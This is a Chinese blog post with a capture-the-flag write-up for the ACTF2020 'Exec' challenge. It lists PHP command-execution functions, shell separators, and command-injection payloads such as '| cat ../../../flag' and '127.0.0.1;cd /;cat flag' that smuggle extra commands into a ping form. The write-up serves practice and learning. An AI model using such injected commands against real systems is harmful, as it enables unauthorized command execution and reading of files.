[ACTF2020 新生赛]Exec1

于 2023-10-11 08:10:20 发布
阅读量107 收藏
点赞数
分类专栏: BUUCTF web题 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/whale_waves/article/details/133759677
版权

RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。

拿到题目后

使用了系统命令执行函数(以下都是系统执行命令,如果php代码中存在需要考虑rce漏洞)

  1. system
  2. passthru
  3. exec
  4. shell_exec
  5. popen
  6. proc_open
  7. pcntl_exec

本题代码猜测是system('ping $a')

使用命令拼接符尝试rce

  1. “|”意思是全面的正常输出,后面的正常输入  例如help | more
  2. “||”     A || B  意思是先运行A失败了运行B
  3. “&”     A & B   意思是先运行A然后运行B
  4. “&&”   A   &  B 意思是先运行A失败了在运行B

payload :| ls  有回显

payload:| ls ../../../     意思是显示向前三个目录里的文件(出现flag)

payload:  | cat ../../../flag

获取到flag

怪兽不会rap_哥哥我会crash
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
[ACTF2020 新生]Exec 1(Linux/远程命令执行)
weixin_45253573的博客
11-17 855
打开环境 又是一个ping的题,猜测远程命令执行。 payload:ping 127.0.0.1;ls 直接显示了index.php,要知道Linux系统显示网页的路径是/var/www/html 也就是说index.php在这个路径里 而且;分号又没有过滤 先返回根目录看看flag在不在:127.0.0.1;cd /;ls 还真在,而且空格,分号都没过滤。 最后的payload:127.0.0.1;cd /;cat flag 得到flag ...
潞安矿区高河井田构造样式探讨
06-24
高河井田位于沁水块坳东南部,主要含煤地层包括二叠系下统山西组和石炭系上统太原组,构造要素走向总体为近SN—NNE向。通过对高河井田构造的系统分析,划分了两大类三亚类主要构造样式,并结合实例分析了各种构造样式对...
matlab的90个实例.rar_actf8x_matlab基础知识的90个实例
最新发布
09-24
1. **矩阵运算**:MATLAB的基础是矩阵,它支持各种矩阵运算,如加法、减法、乘法、除法、转置、逆矩阵、求解线性方程组等。实例可能包括创建不同类型的矩阵(对角矩阵、单位矩阵、稀疏矩阵等),以及进行矩阵运算的...
Jeopardy-Writeups:SniperOJ的CTF挑战比
05-18
SniperOJ的挑战文章和源代码描述平台...─ pwn│ ├── pwn100-bof-x86-64│ ├── pwn100-shellcode-x86-64│ ├── pwn150-static-x86-64│ ├── pwn200-actf-run-circles│ ├── pwn200-shorter-shellc
NTFS文件系统分析
09-19
#### 1. 引言 NTFS(New Technology File System)是微软公司开发的一种先进的文件系统,旨在提供更好的容错性和安全性。随着Windows操作系统的不断演进,NTFS已经成为Windows NT系列操作系统(包括Windows NT 4.0...
光立方888 573 2803程序
06-14
1. 初始化:设置573和2803芯片的工作模式,如时钟频率、PWM占空比等。 2. 数据传输:编写代码将图像或动画数据发送到573芯片,由573将数据暂存并传送到对应的2803芯片。 3. 灰度控制:通过PWM技术控制2803芯片的输出...
PPJEmailPicker:UITextField替换以选择多个电子邮件
05-16
PPJEmailPicker UITextField替换以选择多个电子邮件演示版使用CocoaPods进行安装播客文件Podfile添加到您的Podfile : pod 'PPJEmailPicker'用法以编程方式第1步-导入标题# import " PPJEmailPicker.h "第2步-创建...
focas2接口中文文档
07-28
1. `cnc_actf`:读取实际轴进给率(F),返回实际轴进给率的值。 2. `cnc_absolute`:读取绝对轴位置,返回绝对轴位置的值。 3. `cnc_absolute2`:读取绝对轴位置 2,返回绝对轴位置 2 的值。 4. `cnc_machine`:...
fanuc函数翻译对比.doc
06-07
FANUC函数提供了多种控制轴和主轴相关的函数,例如`cnc_actf`函数用于读取实际轴进给速度,而`cnc_absolute`函数用于读取轴绝对位置。这些函数可以帮助开发者更好地控制和操作机床的控制轴和主轴。 机床状态函数 ...
FANUC_focas函数库(全)(中文版).pdf
09-16
cnc_actf - 读取实际轴进给率(F) **简要描述:** 此函数用于读取当前受控轴的实际进给率(F)值,这对于实时监控和调整加工过程非常有用。 - **适用版本:** 30i-B、0i-D、PM-i - **返回值:** 实际轴进给率值。 ...
eclips3.7 汉化包
10-05
BabelLanguagePack-technology.actf-zh_3.7.0.v20110723043401.zip (4.46%) BabelLanguagePack-technology.bpel-zh_3.7.0.v20110723043401.zip (21.06%) BabelLanguagePack-technology.egit-zh_3.7.0.v...
[ACTF2020 新生]Exec 1
tomatoff的博客
03-14 565
1、进入系统,看到页面: 2、下意识的输入127.0.0.1,可以正常ping通; 3、然后输入1’,1",系统都没有反应,所以还是只能从127.0.0.1在这边下手; 4、说实话,小白才开始做CTF题都是一脸懵,还好查看了下大佬的文章: 火火火与霍霍的[ACTF2020 新生]Exec 1; 5、顺着大佬的思路,使用ping 127.0.0.1;ls尝试: 发现果然没有过滤分号和ls,所以可以通过cd …/查看目录信息,直到输入127.0.0.1;cd …/…/…/;ls,才发现个flag的文件:
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

怪兽不会rap_哥哥我会crash

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值